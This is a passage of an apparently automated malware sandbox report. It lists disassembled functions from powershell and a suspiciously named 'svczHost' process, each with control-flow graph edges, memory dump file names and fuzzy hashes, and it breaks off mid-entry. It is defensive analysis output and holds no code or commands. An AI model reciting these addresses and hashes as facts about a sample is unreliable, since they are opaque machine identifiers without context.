7ffc4adc3044-7ffc4adc305f 416->417 418 7ffc4adc3061-7ffc4adc309d 416->418 417->418 418->234
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.3800054603.00007FFC4ADC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ADC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_7ffc4adc0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4e405fa4e0862bc6dfa792efa4ce35feeebd5943f702bca82d63accf0446734e
                                                                                                          • Instruction ID: 9525b6b7f9a08b080825dc2786b90e9cdfcb0b378230553de08a377049d1aa4b
                                                                                                          • Opcode Fuzzy Hash: 4e405fa4e0862bc6dfa792efa4ce35feeebd5943f702bca82d63accf0446734e
                                                                                                          • Instruction Fuzzy Hash: 0B72CF21A0CA5D9FEBA9FE1884656B877E2EF55300FA401F9C40DCB297CE25EC46C791
                                                                                                          Function 00007FFC4B221E51 Relevance: .3, Instructions: 322COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 425 7ffc4b221e51-7ffc4b221ed7 430 7ffc4b221edd-7ffc4b221ee7 425->430 431 7ffc4b221ff4-7ffc4b2220a5 425->431 432 7ffc4b221f03-7ffc4b221f10 430->432 433 7ffc4b221ee9-7ffc4b221f01 430->433 467 7ffc4b2220a7 431->467 468 7ffc4b2220a8-7ffc4b2220b9 431->468 439 7ffc4b221f95-7ffc4b221f9f 432->439 440 7ffc4b221f16-7ffc4b221f19 432->440 433->432 444 7ffc4b221fae-7ffc4b221ff1 439->444 445 7ffc4b221fa1-7ffc4b221fad 439->445 440->439 443 7ffc4b221f1b-7ffc4b221f23 440->443 443->431 447 7ffc4b221f29-7ffc4b221f33 443->447 444->431 449 7ffc4b221f4c-7ffc4b221f50 447->449 450 7ffc4b221f35-7ffc4b221f45 447->450 449->439 454 7ffc4b221f52-7ffc4b221f55 449->454 455 7ffc4b221f65-7ffc4b221f6e 450->455 456 7ffc4b221f47-7ffc4b221f4a 450->456 454->439 457 7ffc4b221f57-7ffc4b221f5a 454->457 460 7ffc4b221f70-7ffc4b221f7d 455->460 461 7ffc4b221f87-7ffc4b221f94 455->461 456->449 457->455 460->461 463 7ffc4b221f7f-7ffc4b221f85 460->463 463->461 467->468 469 7ffc4b2220bc-7ffc4b2220ee 468->469 470 7ffc4b2220bb 468->470 470->469
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.3818333343.00007FFC4B220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4B220000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_7ffc4b220000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 80d75e57e916d323b410326f94f2b01dbd5706503d237d1ace52b55731961505
                                                                                                          • Instruction ID: 39181a96628b3d0e2cb25ab9b3c365cec2f3c76653c52dd426dc2433180691d4
                                                                                                          • Opcode Fuzzy Hash: 80d75e57e916d323b410326f94f2b01dbd5706503d237d1ace52b55731961505
                                                                                                          • Instruction Fuzzy Hash: B3915921A0DFED4FEBAAAB6848245B57FE2EF56210B0805FBD44DC71B3D9189C16C361
                                                                                                          Function 00007FFC4ADC1FC9 Relevance: .2, Instructions: 226COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.3800054603.00007FFC4ADC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ADC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_7ffc4adc0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7691625b87730ecc329a6ebb8de7ab30e0555315389320d29aaf165b34539c47
                                                                                                          • Instruction ID: 496cc69ebaa8e82a33ad620eea8f54126f2e144fbf9ff8bdf6b0b2c2e3ee2c59
                                                                                                          • Opcode Fuzzy Hash: 7691625b87730ecc329a6ebb8de7ab30e0555315389320d29aaf165b34539c47
                                                                                                          • Instruction Fuzzy Hash: 3651BD22A0DAAD6FEB5AFE2C58515F47BE2EF45310B2800FBC04CCB193ED14A805D361
                                                                                                          Function 00007FFC4ABDED40 Relevance: .1, Instructions: 126COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 510 7ffc4abded40-7ffc4abded79 513 7ffc4abded7b-7ffc4abded85 510->513 514 7ffc4abded8a-7ffc4abded8c 510->514 515 7ffc4abded87 513->515 516 7ffc4abded8d-7ffc4abdedfb 513->516 514->516 515->514 518 7ffc4abdedfd-7ffc4abdee04 516->518 519 7ffc4abdee2b-7ffc4abdee40 518->519 520 7ffc4abdee06-7ffc4abdee1f 518->520 521 7ffc4abdee23-7ffc4abdee29 520->521 521->518
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.3795591363.00007FFC4ABDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ABDD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_7ffc4abdd000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 91ce420e54bc1ca5d8cd008d4f88c3f244691389538bbee8596c55270be8f299
                                                                                                          • Instruction ID: b48da264a516c33198420e85d88bcbd5463d6bcf92ad246b11a7fe5ac8ef422e
                                                                                                          • Opcode Fuzzy Hash: 91ce420e54bc1ca5d8cd008d4f88c3f244691389538bbee8596c55270be8f299
                                                                                                          • Instruction Fuzzy Hash: D341067040DBC44FE7569B299C45A923FF0EF57224B1905DFD088CB5A3DA29A846C7A2
                                                                                                          Function 00007FFC4B223FD4 Relevance: .0, Instructions: 35COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 564 7ffc4b223fd4-7ffc4b223ff7 565 7ffc4b224001-7ffc4b22401c 564->565
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.3818333343.00007FFC4B220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4B220000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_7ffc4b220000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1d7ec06213a9f12a0ae22eab77258745c000b959bccec63f165e271909eaa122
                                                                                                          • Instruction ID: d045693d988f7d20e561d15baf9ee7ec25c3ab1fe06170f02dd28c7047da5f45
                                                                                                          • Opcode Fuzzy Hash: 1d7ec06213a9f12a0ae22eab77258745c000b959bccec63f165e271909eaa122
                                                                                                          • Instruction Fuzzy Hash: E2F0A73171CF044FD744EE1DD8496A1B3D0FBA8311F10462FE44AC3251DA21E4818782

                                                                                                          Non-executed Functions

                                                                                                          Function 00007FF70476BFE0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000011.00000002.4165824356.00007FF7046B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7046B0000, based on PE: true
                                                                                                          • Associated: 00000011.00000002.4165792477.00007FF7046B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000011.00000002.4166728095.00007FF704B2F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000011.00000002.4167022853.00007FF704CA1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000011.00000002.4167022853.00007FF704DB7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000011.00000002.4167022853.00007FF704DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000011.00000002.4167668340.00007FF704FC5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000011.00000002.4167698677.00007FF704FC6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000011.00000002.4167698677.00007FF704FDF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000011.00000002.4167698677.00007FF704FE2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000011.00000002.4167698677.00007FF704FE4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000011.00000002.4167823224.00007FF704FE7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_17_2_7ff7046b0000_svczHost.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2933794660-0
                                                                                                          • Opcode ID: 0f3f96051d0eb21c3945a3f0a1a11fbbf54d8e2d0602f5fb5ac0557b9058b17e
                                                                                                          • Instruction ID: 98831aa18bd8111ac1032113ed6621c6cf077a7244226fa618a31affb4689637
                                                                                                          • Opcode Fuzzy Hash: 0f3f96051d0eb21c3945a3f0a1a11fbbf54d8e2d0602f5fb5ac0557b9058b17e
                                                                                                          • Instruction Fuzzy Hash: FD11A026B04F058AEB00DF61EC952B973A4FB18758F880E31DA6D827A4DF38E1A48350

                                                                                                          Executed Functions

                                                                                                          Function 00007FFC4AD077A6 Relevance: .5, Instructions: 475COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3701115319.00007FFC4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_7ffc4ad00000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9f6329d8e9aa95fca051689d75a25832ef21ac4b4541c10f762f1d4b927789ff
                                                                                                          • Instruction ID: 8e514a1076c9cf40c808003b7bdb61a78bc40983c4617f23a17fa7c533eff027
                                                                                                          • Opcode Fuzzy Hash: 9f6329d8e9aa95fca051689d75a25832ef21ac4b4541c10f762f1d4b927789ff
                                                                                                          • Instruction Fuzzy Hash: 65F1937090CA4D8FEBA8EF28C8557E977E2FF54310F14426AD84DC7295CB34A945CB91
                                                                                                          Function 00007FFC4AD08552 Relevance: .5, Instructions: 462COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3701115319.00007FFC4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_7ffc4ad00000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d74627a6db02ed107892864cf724d0ceadbf900064bc02de86397c17de9361a4
                                                                                                          • Instruction ID: 818b5410c74ea8e7c15ad59c2bec4969b941aee21e95b6fc5c0c0720e0c106bf
                                                                                                          • Opcode Fuzzy Hash: d74627a6db02ed107892864cf724d0ceadbf900064bc02de86397c17de9361a4
                                                                                                          • Instruction Fuzzy Hash: 14E1A33090CA4D8FEBA8EF28D8557E977E2EB54310F14427ED84DC7295CE74A845CB92
                                                                                                          Function 00007FFC4AD08166 Relevance: .3, Instructions: 335COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3701115319.00007FFC4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_7ffc4ad00000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 46c8f162addf1bd4f8b1d685525a360c93579a8eea223b0ad536dbafa45532fb
                                                                                                          • Instruction ID: 165777ba19940a75c23b0d522fb63c1d47a38ac840a7a130d9791fc8514e7e01
                                                                                                          • Opcode Fuzzy Hash: 46c8f162addf1bd4f8b1d685525a360c93579a8eea223b0ad536dbafa45532fb
                                                                                                          • Instruction Fuzzy Hash: E4B1823050CA4D8FEBA8EF28D8557E93BE1FF65310F14427AE44DC7292CA74A945CB92
                                                                                                          Function 00007FFC4AD07C64 Relevance: .1, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3701115319.00007FFC4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_7ffc4ad00000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a4be490adb2df3f6ae1559617112015923a4e23f979a3c4aa6ec67cab75e271b
                                                                                                          • Instruction ID: 3bc9b6ee5ee011bbf9385854900020760e5f7272e68c96feae8a4c093ae22bfb
                                                                                                          • Opcode Fuzzy Hash: a4be490adb2df3f6ae1559617112015923a4e23f979a3c4aa6ec67cab75e271b
                                                                                                          • Instruction Fuzzy Hash: B9311C7081D96D8EFBB8AF16CC05BF832A2FF41319F500579D40D8B192DA386985CB25
                                                                                                          Function 00007FFC4AD033B5 Relevance: .0, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3701115319.00007FFC4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_7ffc4ad00000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0510c104ccc11f1422a3fc18f39dcac0d29ecbdfebd35d47e464fc56c510ba33
                                                                                                          • Instruction ID: 23ec2b26d0fc2978cfbf07e96f6854e412fdd625bc0e94ed26a5822667598cbb
                                                                                                          • Opcode Fuzzy Hash: 0510c104ccc11f1422a3fc18f39dcac0d29ecbdfebd35d47e464fc56c510ba33
                                                                                                          • Instruction Fuzzy Hash: 0401677115CB0C8FD748EF0CE451AA5B7E0FB95324F10056DE58AC3651DA36E882CB45

                                                                                                          Executed Functions

                                                                                                          Function 00007FFC4AD186F6 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @
                                                                                                          • API String ID: 0-2766056989
                                                                                                          • Opcode ID: 21bf6dda1f5ae44835d3e99b24c2797ebb0332bef7ff1788d5173a6a47f2a76f
                                                                                                          • Instruction ID: 2039eda768416eee672f13d8f2b88a5c3898fd34c247bff3638f2966a6ebf9c3
                                                                                                          • Opcode Fuzzy Hash: 21bf6dda1f5ae44835d3e99b24c2797ebb0332bef7ff1788d5173a6a47f2a76f
                                                                                                          • Instruction Fuzzy Hash: B051483190D69D0FE71DEA28A8565ED7BD1EF52325F1802FDD0998B0D2CE29A417C3A1
                                                                                                          Function 00007FFC4AD1871F Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @
                                                                                                          • API String ID: 0-2766056989
                                                                                                          • Opcode ID: 69c9251a60b2fd9ee556e28652c8f272a6126e9eb55ee2c4a99af1ed48c7c203
                                                                                                          • Instruction ID: 8aa8ee0f305d17196a445cb50ef59275b2990b494d173ed193c33910bdd27da7
                                                                                                          • Opcode Fuzzy Hash: 69c9251a60b2fd9ee556e28652c8f272a6126e9eb55ee2c4a99af1ed48c7c203
                                                                                                          • Instruction Fuzzy Hash: 42412835C0D6ED4FE759EA2858916FD7FD2EF52314F2802FDC49A4B1C2CA29640AC3A1
                                                                                                          Function 00007FFC4AD18738 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @
                                                                                                          • API String ID: 0-2766056989
                                                                                                          • Opcode ID: 9bc01115763f973afe2c38a84e59d62a5a216197e91dbd3d642a35ae3ac56e75
                                                                                                          • Instruction ID: 46359fe6200b3827c26578965b813f8db092e421cfde56eee283112474447d99
                                                                                                          • Opcode Fuzzy Hash: 9bc01115763f973afe2c38a84e59d62a5a216197e91dbd3d642a35ae3ac56e75
                                                                                                          • Instruction Fuzzy Hash: F1313534D0C6ED4BEB5CEA2898922FC7BE1EF52324F2802FCD49A571C2CE296416C351
                                                                                                          Function 00007FFC4AD18751 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @
                                                                                                          • API String ID: 0-2766056989
                                                                                                          • Opcode ID: 7aa8e5179f0a50c15b36e066e450aed962df9551e302dd234cac3fb93762c06e
                                                                                                          • Instruction ID: 3e4b2a2ad5fb1ee4aa0dc5b16396212e24ef52d1a8aa246778c89aeaebe52d19
                                                                                                          • Opcode Fuzzy Hash: 7aa8e5179f0a50c15b36e066e450aed962df9551e302dd234cac3fb93762c06e
                                                                                                          • Instruction Fuzzy Hash: 83210434D0C6BD4AEB5CEE18A8922FC77D2EF12314F2803BCD49A471C2CE296516C3A1
                                                                                                          Function 00007FFC4AD16FED Relevance: .4, Instructions: 355COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d9f215a520773abb56634fe0c9b0edcda85cddabcdbae777e5ef87e1dc8fb085
                                                                                                          • Instruction ID: 414a77d4c4c0d1c31ea4a9ac0ca25179b1352cbaab791980c8b004f3cb4d1a75
                                                                                                          • Opcode Fuzzy Hash: d9f215a520773abb56634fe0c9b0edcda85cddabcdbae777e5ef87e1dc8fb085
                                                                                                          • Instruction Fuzzy Hash: 3DB1F7A191D6DE0FEB6EAA3848152796BF2EF52310F2801FFD049C71E7E9189D09C761
                                                                                                          Function 00007FFC4AD17030 Relevance: .3, Instructions: 325COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3046494982541e6a47c097ecd596129d8c3d34dcc76165988c82b2e9ba2b950f
                                                                                                          • Instruction ID: 203c9ec742dda055f849633f89459ec886e1bd38ce8a13564cbeb073a8a10d44
                                                                                                          • Opcode Fuzzy Hash: 3046494982541e6a47c097ecd596129d8c3d34dcc76165988c82b2e9ba2b950f
                                                                                                          • Instruction Fuzzy Hash: 8BA1F7B1A0D69F0FEB5DAA3858112B96AE3EF91310F2401FED049C71E7ED249D09C7A1
                                                                                                          Function 00007FFC4AD184E8 Relevance: .2, Instructions: 242COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 240954e7de4b703daad47a0b4ffd9a7a2f0652b3ac4d896e873c013ab3416b95
                                                                                                          • Instruction ID: f0b8a75f55d14620d3f41354a26c86121fa83e86777a8dd89b12cff878bc1aa4
                                                                                                          • Opcode Fuzzy Hash: 240954e7de4b703daad47a0b4ffd9a7a2f0652b3ac4d896e873c013ab3416b95
                                                                                                          • Instruction Fuzzy Hash: 0041383150DBDA4FEB66EB2888146EA7BA1FF56310F5406FED089C70D7DA24A806C361
                                                                                                          Function 00007FFC4AD17DCE Relevance: .2, Instructions: 205COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ef6bf07ab10d0e2a439d5f72e39496adcf24b105d265cb2486090d4ad433f307
                                                                                                          • Instruction ID: aff05b2e9ec4121681d665c8a6c86242f99a0b86f0efd6e74dfd8fab5b15bb96
                                                                                                          • Opcode Fuzzy Hash: ef6bf07ab10d0e2a439d5f72e39496adcf24b105d265cb2486090d4ad433f307
                                                                                                          • Instruction Fuzzy Hash: A561B071908A2D8FDB68EF18C8557E9B7F1FF68310F0042AAD04EE3251DA70A985CF81
                                                                                                          Function 00007FFC4AD17130 Relevance: .2, Instructions: 200COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 277664a9251ba1c50ff029083771bdc83264a2a661bdef4ad1dec044aa566844
                                                                                                          • Instruction ID: 0392955d9122b347d580d06a11efe1c622640c3fc80d82be6aa81ded25136057
                                                                                                          • Opcode Fuzzy Hash: 277664a9251ba1c50ff029083771bdc83264a2a661bdef4ad1dec044aa566844
                                                                                                          • Instruction Fuzzy Hash: FB51F971E1C65E0BEB6DAA3448656B97BE2EF55300F2001FED00AD75D3ED289C05C7A1
                                                                                                          Function 00007FFC4AD1AC32 Relevance: .2, Instructions: 150COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5843da66d21a46f735069a9cbddfd9cfc20e824bae369501a95213b456dd557e
                                                                                                          • Instruction ID: b0a087cbca4cf965724707ffb92f78ccf5ae3cedcda9d376925ef18db4bdd12e
                                                                                                          • Opcode Fuzzy Hash: 5843da66d21a46f735069a9cbddfd9cfc20e824bae369501a95213b456dd557e
                                                                                                          • Instruction Fuzzy Hash: 9641A231A1CD2D4FDB59FA2898556E9B3E2FF98300F5046B9D00EC3296DE34B946CB90
                                                                                                          Function 00007FFC4AD17ED0 Relevance: .1, Instructions: 146COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e4732a765bc016ba826615483b1bd1dcbf01de3ec7e1340dce42003ded68661f
                                                                                                          • Instruction ID: 9a0c497f175cb23d0ab2861e4f48955b9a26caa419c5a0a1560340e19384964f
                                                                                                          • Opcode Fuzzy Hash: e4732a765bc016ba826615483b1bd1dcbf01de3ec7e1340dce42003ded68661f
                                                                                                          • Instruction Fuzzy Hash: DA41D57590CA5D8EEB68EF48D8407F9B7F1FF18310F1042AAD00E93651DA74A945CF90
                                                                                                          Function 00007FFC4AD17EEF Relevance: .1, Instructions: 125COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 45a940c176d0b75d8e4b80f0c9dc27462fbaa066fb18258c8828ad6896a7a994
                                                                                                          • Instruction ID: 692e39ee47d14816edca45377956f1c24a8da2a7b774ca499d20b4cfc7f3d81b
                                                                                                          • Opcode Fuzzy Hash: 45a940c176d0b75d8e4b80f0c9dc27462fbaa066fb18258c8828ad6896a7a994
                                                                                                          • Instruction Fuzzy Hash: 3A416F7190CA1D8FDF58EF48D895BE9B3B1FF64310F108299D04EA7255DA70AA89CF81
                                                                                                          Function 00007FFC4AD1B029 Relevance: .1, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f2ffe99e6abea6f9f4476e787201b957eb65ac3ddf1f5f4e42b811d50e617351
                                                                                                          • Instruction ID: ac95946e43b822890a360ffdfc71801ed0646890370b75243134f8d44f33d2c4
                                                                                                          • Opcode Fuzzy Hash: f2ffe99e6abea6f9f4476e787201b957eb65ac3ddf1f5f4e42b811d50e617351
                                                                                                          • Instruction Fuzzy Hash: 6831A43050C7898FD390EF78C4586A6BBE1EF99310F144ABEE088C3291DB74D485C751
                                                                                                          Function 00007FFC4AD1B040 Relevance: .1, Instructions: 62COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
